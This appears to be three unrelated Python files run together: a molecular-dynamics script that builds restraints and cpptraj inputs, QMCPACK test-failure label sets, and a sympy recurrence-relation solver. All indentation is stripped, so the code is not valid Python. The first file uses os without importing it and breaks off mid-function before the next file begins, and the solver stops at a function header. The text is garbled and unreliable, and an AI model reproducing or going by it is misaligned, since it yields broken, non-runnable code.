import signal as signal
import subprocess as sp
import sys as sys
from lib import scripts as scripts
def restraints(pose, rest, bb_start, bb_end, weight, stage, mol, comp, bb_equil, sdr_dist, dec_method):
rst = []
atm_num = []
mlines = []
hvy_h = []
hvy_g = []
msk = []
pdb_file = ('vac.pdb')
ligand_pdb_file = ('vac_ligand.pdb')
# Restraint identifiers
recep_tr = '#Rec_TR'
recep_c = '#Rec_C'
recep_d = '#Rec_D'
lign_tr = '#Lig_TR'
lign_c = '#Lig_C'
lign_d = '#Lig_D'
# Change to simulation directory
if stage != 'fe':
os.chdir(pose)
# Find anchors
with open(stage+'-%s.pdb' % mol.lower(), 'r') as f:
data = f.readline().split()
P1 = data[2].strip()
P2 = data[3].strip()
P3 = data[4].strip()
p1_res = P1.split('@')[0][1:]
p2_res = P2.split('@')[0][1:]
p3_res = P3.split('@')[0][1:]
p1_atom = P1.split('@')[1]
p2_atom = P2.split('@')[1]
p3_atom = P3.split('@')[1]
L1 = data[5].strip()
L2 = data[6].strip()
L3 = data[7].strip()
l1_atom = L1.split('@')[1]
l2_atom = L2.split('@')[1]
l3_atom = L3.split('@')[1]
lig_res = L1.split('@')[0][1:]
first_res = data[8].strip()
recep_last = data[9].strip()
# Get backbone atoms and adjust anchors
if (comp != 'c' and comp != 'r' and comp != 'f' and comp != 'w'):
# Get protein backbone atoms
with open('./vac.pdb') as f_in:
lines = (line.rstrip() for line in f_in)
lines = list(line for line in lines if line) # Non-blank lines in a list
for i in range(0, len(lines)):
if (lines[i][0:6].strip() == 'ATOM') or (lines[i][0:6].strip() == 'HETATM'):
if int(lines[i][22:26].strip()) >= 2 and int(lines[i][22:26].strip()) < int(lig_res):
data = lines[i][12:16].strip()
if data == 'CA' or data == 'N' or data == 'C' or data == 'O':
hvy_h.append(lines[i][6:11].strip())
if dec_method == 'sdr':
if (comp == 'e' or comp == 'v'):
rec_res = int(recep_last) + 2
lig_res = str((int(lig_res) + 1))
L1 = ':'+lig_res+'@'+l1_atom
L2 = ':'+lig_res+'@'+l2_atom
L3 = ':'+lig_res+'@'+l3_atom
hvy_h = []
hvy_g = []
# Adjust anchors
p1_resid = str(int(p1_res) + 1)
p2_resid = str(int(p2_res) + 1)
p3_resid = str(int(p3_res) + 1)
P1 = ":"+p1_resid+"@"+p1_atom
P2 = ":"+p2_resid+"@"+p2_atom
P3 = ":"+p3_resid+"@"+p3_atom
# Get host heavy atoms
with open('./vac.pdb') as f_in:
lines = (line.rstrip() for line in f_in)
lines = list(line for line in lines if line) # Non-blank lines in a list
for i in range(0, len(lines)):
if (lines[i][0:6].strip() == 'ATOM') or (lines[i][0:6].strip() == 'HETATM'):
if int(lines[i][22:26].strip()) >= 3 and int(lines[i][22:26].strip()) <= rec_res:
data = lines[i][12:16].strip()
if data == 'CA' or data == 'N' or data == 'C' or data == 'O':
hvy_h.append(lines[i][6:11].strip())
# Get bulk guest heavy atoms
with open('./vac.pdb') as f_in:
lines = (line.rstrip() for line in f_in)
lines = list(line for line in lines if line) # Non-blank lines in a list
if comp == 'e':
for i in range(0, len(lines)):
if (lines[i][0:6].strip() == 'ATOM') or (lines[i][0:6].strip() == 'HETATM'):
if lines[i][22:26].strip() == str(int(lig_res) + 2):
data = lines[i][12:16].strip()
if data[0] != 'H':
hvy_g.append(lines[i][6:11].strip())
if comp == 'v':
for i in range(0, len(lines)):
if (lines[i][0:6].strip() == 'ATOM') or (lines[i][0:6].strip() == 'HETATM'):
if lines[i][22:26].strip() == str(int(lig_res) + 1):
data = lines[i][12:16].strip()
if data[0] != 'H':
hvy_g.append(lines[i][6:11].strip())
# Adjust anchors for ligand only
if (comp == 'c' or comp == 'w' or comp == 'f'):
L1 = L1.replace(':'+lig_res, ':1')
L2 = L2.replace(':'+lig_res, ':1')
L3 = L3.replace(':'+lig_res, ':1')
# Adjust anchors for protein only
if (comp == 'r'):
p1_new = int(p1_res) - 1
p2_new = int(p2_res) - 1
p3_new = int(p3_res) - 1
P1 = P1.replace(':'+p1_res, ':'+str(p1_new))
P2 = P2.replace(':'+p2_res, ':'+str(p2_new))
P3 = P3.replace(':'+p3_res, ':'+str(p3_new))
# Get a relation between atom number and masks
atm_num = scripts.num_to_mask(pdb_file)
ligand_atm_num = scripts.num_to_mask(ligand_pdb_file)
# Get number of ligand atoms
with open('./vac_ligand.pdb') as myfile:
data = myfile.readlines()
vac_atoms = int(data[-3][6:11].strip())
# Define anchor atom distance restraints on the protein
rst.append(''+P1+' '+P2+'')
rst.append(''+P2+' '+P3+'')
rst.append(''+P3+' '+P1+'')
# Define protein dihedral restraints in the given range
beg = bb_start - int(first_res) + 2
end = bb_end - int(first_res) + 2
if dec_method == 'sdr':
if (comp == 'e' or comp == 'v'):
beg = bb_start - int(first_res) + 3
end = bb_end - int(first_res) + 3
nd = 0
for i in range(beg, end+1):
j = i+1
psi1 = ':'+str(i)+'@N'
psi2 = ':'+str(i)+'@CA'
psi3 = ':'+str(i)+'@C'
psi4 = ':'+str(j)+'@N'
psit = '%s %s %s %s' % (psi1, psi2, psi3, psi4)
rst.append(psit)
nd += 1
phi1 = ':'+str(i)+'@C'
phi2 = ':'+str(j)+'@N'
phi3 = ':'+str(j)+'@CA'
phi4 = ':'+str(j)+'@C'
phit = '%s %s %s %s' % (phi1, phi2, phi3, phi4)
rst.append(phit)
nd += 1
# Define translational/rotational and anchor atom distance restraints on the ligand
rst.append(''+P1+' '+L1+'')
rst.append(''+P2+' '+P1+' '+L1+'')
rst.append(''+P3+' '+P2+' '+P1+' '+L1+'')
rst.append(''+P1+' '+L1+' '+L2+'')
rst.append(''+P2+' '+P1+' '+L1+' '+L2+'')
rst.append(''+P1+' '+L1+' '+L2+' '+L3+'')
# New restraints for ligand only
if (comp == 'c' or comp == 'w' or comp == 'f'):
rst = []
# Get ligand dihedral restraints from ligand parameter/pdb file
spool = 0
with open('./vac_ligand.prmtop') as fin:
lines = (line.rstrip() for line in fin)
lines = list(line for line in lines if line) # Non-blank lines in a list
for line in lines:
if 'FLAG DIHEDRALS_WITHOUT_HYDROGEN' in line:
spool=1
elif 'FLAG EXCLUDED_ATOMS_LIST' in line:
spool=0
if spool != 0 and (len(line.split()) > 3):
mlines.append(line)
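# The dihedral records collected above hold AMBER prmtop coordinate-array
# pointers (3*(atom_index - 1), with the sign used as a flag), so the loops
# below recover 1-based atom numbers via abs(value)//3 + 1 before building the
# cpptraj masks. (Descriptive note; assumes the standard prmtop convention.)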
for i in range(0, len(mlines)):
data = mlines[i].split()
if int(data[3]) > 0:
anum = []
for j in range (0, len(data)):
anum.append(abs(int(data[j])//3)+1)
msk.append('%s %s %s %s' %(ligand_atm_num[anum[0]], ligand_atm_num[anum[1]], ligand_atm_num[anum[2]], ligand_atm_num[anum[3]]))
for i in range(0, len(mlines)):
data = mlines[i].split()
if len(data) > 7:
if int(data[8]) > 0:
anum = []
for j in range (0, len(data)):
anum.append(abs(int(data[j])//3)+1)
msk.append('%s %s %s %s' %(ligand_atm_num[anum[5]], ligand_atm_num[anum[6]], ligand_atm_num[anum[7]], ligand_atm_num[anum[8]]))
excl = msk[:]
ind = 0
mat = []
for i in range(0, len(excl)):
data = excl[i].split()
for j in range(0, len(excl)):
if j == i:
break
data2 = excl[j].split()
if (data[1] == data2[1] and data[2] == data2[2]) or (data[1] == data2[2] and data[2] == data2[1]):
ind = 0
for k in range(0, len(mat)):
if mat[k] == j:
ind = 1
if ind == 0:
mat.append(j)
for i in range(0, len(mat)):
msk[mat[i]]= ''
if (comp != 'c' and comp != 'w' and comp != 'f'):
msk = filter(None, msk)
msk = [m.replace(':1',':'+lig_res) for m in msk]
for i in range(0, len(msk)):
rst.append(msk[i])
# New restraints for protein only
if (comp == 'r'):
rst = []
rst.append(''+P1+' '+P2+'')
rst.append(''+P2+' '+P3+'')
rst.append(''+P3+' '+P1+'')
beg = bb_start - int(first_res) + 1
end = bb_end - int(first_res) + 1
nd = 0
for i in range(beg, end+1):
j = i+1
psi1 = ':'+str(i)+'@N'
psi2 = ':'+str(i)+'@CA'
psi3 = ':'+str(i)+'@C'
psi4 = ':'+str(j)+'@N'
psit = '%s %s %s %s' % (psi1, psi2, psi3, psi4)
rst.append(psit)
nd += 1
phi1 = ':'+str(i)+'@C'
phi2 = ':'+str(j)+'@N'
phi3 = ':'+str(j)+'@CA'
phi4 = ':'+str(j)+'@C'
phit = '%s %s %s %s' % (phi1, phi2, phi3, phi4)
rst.append(phit)
nd += 1
# Get initial restraint values for references
assign_file = open('assign.in', 'w')
assign_file.write('%s %s %s %s %s %s %s\n'%('# Anchor atoms', P1, P2, P3, L1, L2, L3))
assign_file.write('parm full.hmr.prmtop\n')
assign_file.write('trajin full.inpcrd\n')
for i in range(0, len(rst)):
arr = rst[i].split()
if len(arr) == 2:
assign_file.write('%s %s %s'%('distance r'+str(i), rst[i], 'noimage out assign.dat\n'))
if len(arr) == 3:
assign_file.write('%s %s %s'%('angle r'+str(i), rst[i], 'out assign.dat\n'))
if len(arr) == 4:
assign_file.write('%s %s %s'%('dihedral r'+str(i), rst[i], 'out assign.dat\n'))
assign_file.close()
sp.call('cpptraj -i assign.in > assign.log', shell=True)
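# For reference, the generated assign.in holds one cpptraj command per restraint,
# e.g. (illustrative masks only; the actual anchors come from P1-P3/L1-L3 above):
#   distance r0 :425@CA :433@CA noimage out assign.dat
#   angle    r4 :433@CA :425@CA :12@C1 out assign.dat
#   dihedral r8 :425@CA :12@C1 :12@C2 :12@C3 out assign.dat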
# Assign reference values for restraints
with open('./assign.dat') as fin:
lines = (line.rstrip() for line in fin)
lines = list(line for line in lines if line) # Non-blank lines in a list
vals = lines[1].split()  # assumed: cpptraj writes a header line followed by a single line of reference values
#! /usr/bin/env python3
import sys
import traceback
def error(msg=None):
if msg is None:
sys.stdout.write(traceback.format_exc())
else:
sys.stdout.write('error: '+msg+'\n')
#end if
sys.exit(1)
#end def error
# label descriptions
#
# main classification
# stable - test is expected to pass
# unstable - test may fail (definitely or with some probability)
# (stable/unstable are exclusive and comprehensive for all tests)
#
# reason for instability
# bug - test failure definitely a bug and QMCPACK needs to be fixed
# unsupported - test fails because feature is not supported and was not before
# poor_test - test fails because test is insufficient (false positive)
# cause_unknown - cause/nature of failure is not known and needs investigation
# (bug/unsupported/poor/unknown are comprehensive for failures)
#
# failure type classification of unstable tests
# hard_fail - ungraceful crash (segfault, etc)
# abort - controlled abort
# check_fail - fails rigorous non-statistical check (e.g. checksum)
# reference_stat_fail - fails separate reference level check by > 5 sigma
# definite_stat_fail - statistical failure by > 5 sigma
# intermittent_stat_fail - statistical failure by < 5 sigma
# deterministic_fail - fails non-rigorous deterministic check
# (failure types are comprehensive for failures)
#
# test quality categories
# good_test - test well designed: test fail means there is a bug
# any failure means: action needed to fix QMCPACK
# poor_test - test poorly designed and failure likely reflects this
# regardless of pass/fail: action needed to improve test
# quality_unknown - test quality has not yet been assessed
# code failure means: action needed to fix QMCPACK
# statistical failure means: prioritize quality assessment
# (good/poor/unknown are exclusive and comprehensive for all tests)
#
# put failing tests into the following categories (these determine the others)
# unsupported
# hard_fail
# abort
# check_fail
# reference_stat_fail
# definite_stat_fail
# intermittent_stat_fail
# deterministic_fail
# poor_test
#
# main actions for developers and corresponding categories
# fix known bugs in QMCPACK - identified by label "bug"
# fix poor tests - identified by label "poor_test"
# assess test quality - identified by label "quality_unknown"
# investigate failure causes - identified by label "cause_unknown"
# run reference-level statistical test in this case
def create_label_sets():
# primary sets, all others derived from these
unsupported = set() # failure categories may depend on build
hard_fail = set()
abort = set()
check_fail = set()
reference_stat_fail = set()
definite_stat_fail = set()
intermittent_stat_fail = set()
deterministic_fail = set()
good_test = set() # test quality does not depend on build
poor_test = set()
# universal failures (irrespective of build)
hard_fail |= set([
# https://github.com/QMCPACK/qmcpack/issues/848
'developer-heg_54_J2rpa',
])
abort |= set([
# https://github.com/QMCPACK/qmcpack/issues/998
'long-LiH_dimer_pp-vmc_hf_sdj_estimator_spindensity',
'short-LiH_dimer_pp-vmc_hf_sdj_estimator_spindensity',
# https://github.com/QMCPACK/qmcpack/issues/1040
'short-diamondC-afqmc_hyb_nn2',
'short-diamondC-afqmc_incmf_nn2',
'short-diamondC-afqmc_nn2',
])
check_fail |= set([
# https://github.com/QMCPACK/qmcpack/issues/934
'short-diamondC_1x1x1_pp-dmc-estimator-density',
'short-diamondC_1x1x1_pp-dmc-estimator-spindensity',
'long-diamondC_1x1x1_pp-dmc-estimator-density',
'long-diamondC_1x1x1_pp-dmc-estimator-spindensity',
])
definite_stat_fail |= set([
# https://github.com/QMCPACK/qmcpack/issues/995
# https://github.com/QMCPACK/qmcpack/issues/1052
'short-diamondC_1x1x1_pp-vmc-J2-estimator-1rdm-4-4',
'short-diamondC_1x1x1_pp-vmc-noJ-estimator-1rdm-4-4',
'long-diamondC_1x1x1_pp-vmc-J2-estimator-1rdm-4-4',
'long-diamondC_1x1x1_pp-vmc-noJ-estimator-1rdm-4-4',
# https://github.com/QMCPACK/qmcpack/issues/982
'long-diamondC_1x1x1_pp-vmc-estimator-energydensity-voronoi',
'long-diamondC_1x1x1_pp-vmc-estimator-energydensity-cell',
'long-diamondC_1x1x1_pp-dmc-estimator-energydensity-cell',
'long-LiH_dimer_ae-vmc_hf_noj_estimator_energydensity_voronoi',
'long-LiH_dimer_ae-vmc_hf_sdj_estimator_energydensity_voronoi',
'short-diamondC_1x1x1_pp-vmc-estimator-energydensity-voronoi',
'short-diamondC_1x1x1_pp-vmc-estimator-energydensity-cell',
'short-diamondC_1x1x1_pp-dmc-estimator-energydensity-cell',
'short-LiH_dimer_ae-vmc_hf_noj_estimator_energydensity_voronoi',
'short-LiH_dimer_ae-vmc_hf_sdj_estimator_energydensity_voronoi',
])
intermittent_stat_fail |= set([
'long-diamondC_1x1x1_pp-vmc-dmc-allp_sdj',
'long-diamondC_2x1x1_pp-dmc-reconf_sdj',
'long-diamondC_2x1x1_pp-vmc_sdj',
'long-H2O_dimer_sep_pp-j3_dmc_la',
'short-bccH_1x1x1_ae-csvmc-all_sdj',
'short-bccH_1x1x1_ae-csvmc-all-nodrift_sdj',
'short-bccH_1x1x1_ae-csvmc-pbyp-nodrift_sdj',
'short-bccH_1x1x1_ae-dmc-all_sdj',
'short-bccH_1x1x1_ae-vmc-all-nodrift_sdj',
'short-C2_pp-msdj_vmc',
'short-C2_pp-msdj-traditional_vmc',
'short-diamondC_1x1x1_pp-vmc-dmc-allp_sdj',
'short-diamondC_2x1x1_pp-dmc-reconf_sdj',
'short-H4-opt-adaptive',
'long-LiH_dimer_ae_qp-vmc_hf_noj',
'short-LiH_dimer_pp-vmc_hf_sdj_hdf5',
'short-LiH_dimer_pp-vmc_hf_sdj_xml',
'short-LiH_solid_1x1x1_pp-x-dmcnl-hf_noj',
'short-LiH_solid_1x1x1_hybridrep_pp-x-vmc_hf_noj',
'short-diamondC_1x1x1_pp-vmc_sdj_kspace-1-16',
'short-diamondC_2x1x1_pp-dmc_sdj-1-16',
'short-diamondC_2x1x1_hybridrep_pp-vmc_sdj',
'short-bccH_1x1x1_ae-dmc_sdj',
'short-NiO_a4_e48_pp-dmc-TMv1v3_sdj',
'long-heg_14_gamma-sj-1-16',
'short-chn_ae_cuspCorrection-vmc',
'short-li2_sto-sj_dmc',
'short-LiH_dimer_ae_qp-vmc_hf_noj',
'short-LiH_dimer_ae_pyscf-vmc_hf_noj',
'short-LiH_ae-vmc_msdj-1-16',
'short-LiH_ae-vmc_msdj_noj-1-16',
'vmc_short_C2_pp_msdj-H5',
])
poor_test |= set([
'short-bccH_2x2x2_ae-deriv',
'short-bccH_2x2x2_ae-gamma-deriv',
'short-bccH_2x2x2_ae-grad_lap',
'short-bccH_3x3x3_ae-deriv',
'short-bccH_3x3x3_ae-gamma-deriv',
'short-bccH_3x3x3_ae-grad_lap',
'short-bccH_3x3x3_ae-not_orth-deriv',
])
# aos specific (but general otherwise)
if aos:
intermittent_stat_fail |= set([
'short-H4-orb-opt-dmc',
])
check_fail |= set([
'short-bccH_2x2x2_ae-deriv',
'short-bccH_2x2x2_ae-gamma-deriv',
'short-bccH_2x2x2_ae-grad_lap',
'short-bccH_3x3x3_ae-deriv',
'short-bccH_3x3x3_ae-gamma-deriv',
'short-bccH_3x3x3_ae-grad_lap',
'short-bccH_3x3x3_ae-not_orth-deriv',
])
#end if
# soa specific (but general otherwise)
if soa:
hard_fail |= set([
'long-heg_14_gamma-sjb',
'short-heg_14_gamma-sjb',
])
abort |= set([
'long-c_no-hf_vmc',
'long-c_no-sj_dmc',
'short-bccH_2x2x2_ae-deriv',
'short-bccH_3x3x3_ae-deriv',
'short-bccH_3x3x3_ae-grad_lap',
'short-c_no-hf_vmc',
'short-c_no-sj_dmc',
'short-H2-FDLR',
'short-H2-orb-opt',
'short-H4-FDLR',
'short-H4-orb-opt',
'short-H4-orb-opt-dmc',
'short-bccH_2x2x2_ae-gamma-deriv',
'short-bccH_2x2x2_ae-grad_lap',
'short-bccH_3x3x3_ae-gamma-deriv',
'short-bccH_3x3x3_ae-not_orth-deriv',
])
check_fail |= set([
'short-bccH_2x2x2_ae-deriv',
'short-bccH_3x3x3_ae-deriv',
'short-bccH_3x3x3_ae-grad_lap',
])
intermittent_stat_fail |= set([
'short-H4-opt-cslinear-rescale',
])
#end if
# gpu specific (but general otherwise)
if gpu:
check_fail |= set([
'restart-1-16',
'short-diamondC_1x1x1_pp-dmc-estimator-density',
'short-diamondC_1x1x1_pp-dmc-estimator-spindensity',
])
poor_test |= set([
'restart-1-16',
])
unsupported |= set([
'estimator-skinetic',
'short-afqmc-N2_vdz',
'short-diamondC-afqmc',
'short-diamondC-afqmc_hyb',
'short-diamondC-afqmc_hyb_nn2',
'short-diamondC-afqmc_incmf',
'short-diamondC-afqmc_incmf_nn2',
'short-diamondC-afqmc_nn2',
'short-diamondC_1x1x1_hybridrep_pp-vmc_sdj',
'short-diamondC_1x1x1_pp-vmc_sdj_kspace',
'short-diamondC_2x1x1_hybridrep_pp-vmc_sdj',
'short-LiH_solid_1x1x1_hybridrep_pp-x-vmc_hf_noj',
'short-monoO_1x1x1_pp-vmc_sdj3',
'short-NiO_a4_e48-batched_pp-vmc_sdj3',
'short-NiO_a4_e48-hybridrep-batched_pp-vmc_sdj3',
'short-NiO_a4_e48-hybridrep-pp-vmc_sdj3',
'short-NiO_a4_e48_pp-vmc_sdj3',
])
#end if
# real specific (but general otherwise)
if real:
None
#end if
# complex specific (but general otherwise)
if comp:
None
#end if
# mixed precision specific (but general otherwise)
if mixed:
abort |= set([
'short-diamondC_1x1x1_pp-vmc-estimator-energydensity-cell',
'short-diamondC_1x1x1_pp-vmc-estimator-energydensity-voronoi',
'short-LiH_dimer_ae-vmc_hf_noj_estimator_energydensity_voronoi',
'short-LiH_dimer_pp-vmc_hf_sdj_estimator_spindensity',
])
#end if
# finer details based on build
# AoS issues
if aos and cpu and real and full:
abort |= set([
'long-NiO_afm-afqmc',
'short-c_no-hf_vmc-4-4',
])
definite_stat_fail |= set([
'long-monoO_1x1x1_pp-vmc_sdj3', # flux fails
'short-H4-opt-cslinear-rescale', # energy fails
'short-LiH_dimer_ae_qp-vmc_hf_noj', # energy fails
])
elif aos and cpu and real and mixed:
definite_stat_fail |= set([
'short-c_no-sj_dmc', # variance fails
])
elif aos and cpu and comp and full:
None
elif aos and cpu and comp and mixed:
None
elif aos and gpu and real and full:
None
elif aos and gpu and real and mixed:
None
elif aos and gpu and comp and full:
None
elif aos and gpu and comp and mixed:
None
#end if
# SoA issues
if soa and comp and cpu:
abort |= set([
'short-diamondC_1x1x1_pp-vmc_gaussian_sdj',
'short-diamondC_2x1x1_pp-vmc_gaussian_sdj',
'long-diamondC_2x1x1_pp-dmc_gaussian_sdj',
])
#end if
if soa and cpu and real and full:
abort |= set([
'long-NiO_afm-afqmc',
])
check_fail |= set([
'short-diamondC_2x1x1_pp-vmc_gaussian_sdj', # ionion fails
])
definite_stat_fail |= set([
'long-C2_pp-msdj_vmc',
'long-diamondC_1x1x1_pp-vmc-dmc-allp_sdj',
])
elif soa and cpu and real and mixed:
check_fail |= set([
'short-diamondC_2x1x1_pp-vmc_gaussian_sdj', # ionion fails
])
elif soa and cpu and comp and full:
None
elif soa and cpu and comp and mixed:
None
elif soa and gpu and real and full:
None
elif soa and gpu and real and mixed:
None
elif soa and gpu and comp and full:
None
elif soa and gpu and comp and mixed:
None
#end if
# derive all other sets from the primary sets
# don't require failure type to be enumerated for unsupported
# just assume abort is used for now
abort |= unsupported - abort - hard_fail
# weak failures: insufficient to tell if there is a bug
weak_fail = intermittent_stat_fail \
| deterministic_fail
# strong failures: sufficient to tell if there is a bug
strong_fail = hard_fail \
| abort \
| check_fail \
| reference_stat_fail \
| definite_stat_fail
fail = weak_fail | strong_fail
# a test is unstable if it fails for any reason
unstable = fail | poor_test | unsupported
# a failure is a bug if it is a strong failure (strong fail => bug)
# intermittent failures imply bugs only with verified good test data
# unsupported features are not bugs
bug = (strong_fail | (good_test & intermittent_stat_fail)) - unsupported
# a failing test needs to be followed up with a reference-level statistical test
# if it is insufficient on its own to imply a bug
# currently this includes intermittent failures with test data of unverified quality
# and deterministic failures
cause_unknown = unstable - bug - unsupported - poor_test
positive_label_sets = dict(
# main classification
unstable = unstable,
# reason for failure
bug = bug,
unsupported = unsupported,
poor_test = poor_test,
cause_unknown = cause_unknown,
# failure type classification
hard_fail = hard_fail,
abort = abort,
check_fail = check_fail,
reference_stat_fail = reference_stat_fail,
definite_stat_fail = definite_stat_fail,
intermittent_stat_fail = intermittent_stat_fail,
deterministic_fail = deterministic_fail,
# test quality categories (also poor_test)
good_test = good_test,
)
negative_label_sets = dict(
# main classification
#stable = unstable, # can't add this because ctest regex matches "unstable"
# test quality categories
quality_unknown = good_test | poor_test,
)
return positive_label_sets,negative_label_sets
#end def create_label_sets
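# A minimal usage sketch, assuming the aos/soa/gpu/real/comp/mixed build flags are
# already defined in scope: look up which labels apply to a single test name.
#
#   positive, negative = create_label_sets()
#   test = 'short-diamondC_1x1x1_pp-dmc-estimator-density'
#   labels = sorted(name for name, tests in positive.items() if test in tests)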
def check_exclusive(*labels):
# fast check of mutual exclusivity
exclusive = True
lsets = [positive_label_sets[l] for l in labels]
combined = set(lsets[0])
for lset in lsets[1:]:
exclusive &= len(lset & combined)==0
if not exclusive:
break
#end if
combined |= lset
#end for
# slower process to report errors
if not exclusive:
for i in range(len(labels)):
for j in range(i):
overlap = lsets[i] & lsets[j]
if(len(overlap)>0):
error('label sets {0} and {1} are not mutually exclusive\n overlap: {2}'.format(labels[i],labels[j],sorted(overlap)))
#end if
#end for
#end for
#end if
#end def check_exclusive
def check_comprehensive(full_label,*other_labels):
full = set(positive_label_sets[full_label])
for label in other_labels:
full -= positive_label_sets[label]
#end for
if len(full)>0:
error('the following sets are not comprehensive:\n {0}\nthese should equate to set: {1}\nbut the following tests are not labeled: {2}'.format(other_labels,full_label,sorted(full)))
#end if
#end def check_comprehensive
def check_positive_label_sets(positive_label_sets):
check_exclusive('good_test','poor_test')
check_comprehensive('unstable',
'bug',
'unsupported',
'poor_test',
'cause_unknown'
)
check_comprehensive('unstable',
                    'hard_fail',
                    'abort',
                    'check_fail',
                    'reference_stat_fail',
                    'definite_stat_fail',
                    'intermittent_stat_fail',
                    'deterministic_fail',
                    'poor_test',
                    'unsupported'
                    )
#end def check_positive_label_sets
# Repository: rowanG077/RecurrenceRelationSolver
#!/usr/bin/env python3
# coding=utf-8
import logging
import re
import sympy
from sympy.solvers.solveset import linsolve
class RecurrenceSolveFailed(Exception):
"""
RecurrenceSolveFailed is raised when a recurrence relation could not be solved
"""
def __init__(self, reason):
"""
create RecurrenceSolveFailed object
Args:
reason (string): Why the solve couldn't be performed
"""
self.reason = reason
class RecurrenceRelation(object):
"""
RecurrenceRelation object that contains a recurrence relation
and its initial conditions. Allows for solving and verification.
"""
def __init__(self, recurrence, initialConditions):
"""
create RecurrenceRelation object
Args:
recurrence (string): The recurrence as a string
initialConditions (dict of string: string): The initial conditions
"""
# contains the context for running sympy functions
# on the recurrence relation
self._sympy_context = {
"s": sympy.Function("s"),
"n": sympy.var("n", integer = True)
}
# Translate input string expression to sympy expression
self._recurrence = self._to_sympy(recurrence)
self._initialConditions = { k: self._to_sympy(v) for (k,v) in initialConditions.items() }
# Solved values will be stored here in a bottom up dynamic programming manner
self._solvedValues = dict(self._initialConditions)
# Contains the closed from as calculated by our own algorithm
self._closedForm = None
def _to_sympy(self, expr):
"""
sympy represents powers not with ^ but with **.
Translate from normal representation to sympy representation here
Args:
expr (string): string of an expression in normal format
Returns:
sympy expression: The string parsed into a sympy expression
"""
raw = re.sub(r"\^", "**", expr)
return sympy.sympify(raw, self._sympy_context).expand()
def _from_sympy(self, expr):
"""
sympy represents square roots as sqrt(), but we require ^(1/2);
likewise sympy prints powers as **, whereas we need ^.
This function takes a sympy expression and returns the appropriate string.
Args:
expr (sympy expression): string of an expression in sympy format
Returns:
string: The sympy expression stringified
"""
expressionString = re.sub(r"\*\*", "^", str(expr))
i = expressionString.find("sqrt")
while i != -1:
nestCount = 0
endSqrtIndex = -1
for j in range(i, len(expressionString)):
if expressionString[j] == '(':
nestCount += 1
elif expressionString[j] == ')':
if nestCount == 1:
endSqrtIndex = j + 1
break
nestCount -= 1
sqrtExpr = expressionString[i+4:endSqrtIndex].strip()
expressionString = "%s(%s^(1/2))%s" % (expressionString[0:i], sqrtExpr, expressionString[endSqrtIndex:])
i = expressionString.find("sqrt")
return expressionString
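# Example (assumed sympy print ordering): an expression printed by sympy as
# "2**n*sqrt(5)" is rendered by this method as "2^n*((5)^(1/2))".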
def getRecurrence(self):
"""
Get the recurrence
Returns:
string: The recurrence
"""
return self._from_sympy(self._recurrence)
def getLowerBoundDomain(self):
"""
get the lower bound of the domain on which the recurrence is defined
Returns:
int: The start where the recurrence is defined
"""
return min([int(k) for k,v in self._initialConditions.items()])
def _set_free_variables_to_zero(self, solution):
"""
Given a sympy solution that may still contain free variables, substitute 0 for
every free variable so that a single concrete solution remains.
Args:
    solution (dict of sympy symbol: sympy expression): The solution for each symbol,
                                                       possibly containing free variables
Returns:
    dict of sympy symbol: sympy expression: The solution with every free variable set to 0
"""
# some symbols might not be in the solutions itself so add them here
newSolution = { a:solution[a] if a in solution else a for sym, sol in solution.items() for a in sol.atoms(sympy.Symbol) }
newSolution.update(solution)
# Find all free variables and create a dict so we can easily replace them
replaceDict = { sym:0 for sym, sol in newSolution.items() if sym == sol }
return { symbol: expr.subs(replaceDict) for symbol, expr in newSolution.items() }
def _getGeneralSolution(self, realRoots):
"""
get the general solution given the roots of the characteristic equation.
Args:
realRoots (dict of sympy expr: int): The roots of the characteristic equation with multiplicities
Returns:
sympy expression: The general solution
"""
ctx = {
"n": self._sympy_context["n"]
}
# Generate general solution
generalSolutionTerms = []
for i, (s,m) in enumerate(realRoots.items()):
terms = []
for j in range(0, m):
varname = "p_%d_%d" % (i,j)
ctx[varname] = sympy.var(varname)
terms.append("%s * n**%d" % (varname, j))
generalSolutionTerms.append("(%s)*(%s)**n" % (" + ".join(terms), str(s)))
return sympy.sympify(' + '.join(generalSolutionTerms), ctx), ctx
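# Example (illustrative): for characteristic roots {2: 1, 3: 2} the string built
# above is "(p_0_0 * n**0)*(2)**n + (p_1_0 * n**0 + p_1_1 * n**1)*(3)**n", i.e. the
# textbook form alpha_1*2^n + (alpha_2 + alpha_3*n)*3^n with undetermined p_i_j.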
def _calculateClosedFromGeneralSolution(self, generalSolution, ctx):
"""
get the closed form equation for a general solution.
Args:
generalSolution (sympy expression): The general solution
ctx (dict of string: sympy symbol): The context of the general solution
Returns:
sympy expression: The closed form solved
"""
# Create system of equations using initial conditions
equations = []
for i,c in self._initialConditions.items():
eq = generalSolution - sympy.sympify("(%s)" % str(c))
equations.append(eq.subs(ctx["n"], i))
logging.info("Solving the system of linear equations:")
for e in equations:
logging.info("\t%s" % str(e))
# Solve the system of equation
solve_symbols = [ e for n, e in ctx.items() if n != "n" ]
solutions = linsolve(equations, solve_symbols)
if len(solutions) == 0:
raise RecurrenceSolveFailed("No solution to the system of equations for the alphas could be found.")
logging.info("Raw solutions with possibly free variables: %s" % str(solutions))
# linsolve returns a set so we translate it to a dict for the _set_free_variables_to_zero function
solution = { symbol:sol for symbol, sol in zip(solve_symbols, list(list(solutions)[0])) }
logging.info("Dict solution with possibly free variables: %s" % str(solution))
solution = self._set_free_variables_to_zero(solution)
logging.info("Dict solution no free variables: %s" % str(solution))
# fill in the solution of the system
solved = generalSolution.subs(solution)
return solved
def _theorem6Classifier(self, expr, ctx, buckets):
"""
Classify a single term in the non-homogeneous part of a recurrence relation.
Classification means that the term is decomposed into a constant factor,
a constant raised to the power n, and n raised to a constant power.
Args:
expr (sympy expression): The term to classify
ctx (dict of string: sympy symbol): The context of the solution
buckets (dict of sympy expression: dict of sympy expression: sympy symbol): Contains the classified terms
in the form (the constant to the power n):
(n to the power of a constant): (constant)
"""
args = expr.args
if expr.func != sympy.Mul:
args = [expr]
power = sympy.sympify("1", ctx)
constant = sympy.sympify("1", ctx)
poly = sympy.sympify("0", ctx)
for a in args:
if ctx["n"] not in a.atoms():
constant = a
elif a.func == sympy.Symbol:
poly = sympy.sympify("1", ctx)
elif a.func == sympy.Pow and a.args[0].func == sympy.Symbol:
poly = a.args[1]
elif a.func == sympy.Pow and a.args[1].func == sympy.Symbol:
power = a.args[0]
if power not in buckets:
buckets[power] = {}
buckets[power][poly] = constant
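# Example (illustrative): classifying F(n) = 3*n**2*2**n + 5 term by term fills
# buckets roughly as {2: {2: 3}, 1: {0: 5}} -- keyed first by the exponential base b
# of b**n, then by the polynomial degree of n, with the constant factor as the value.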
def _theorem6SolutionBuilder(self, realroots, nonHomogenous, ctx):
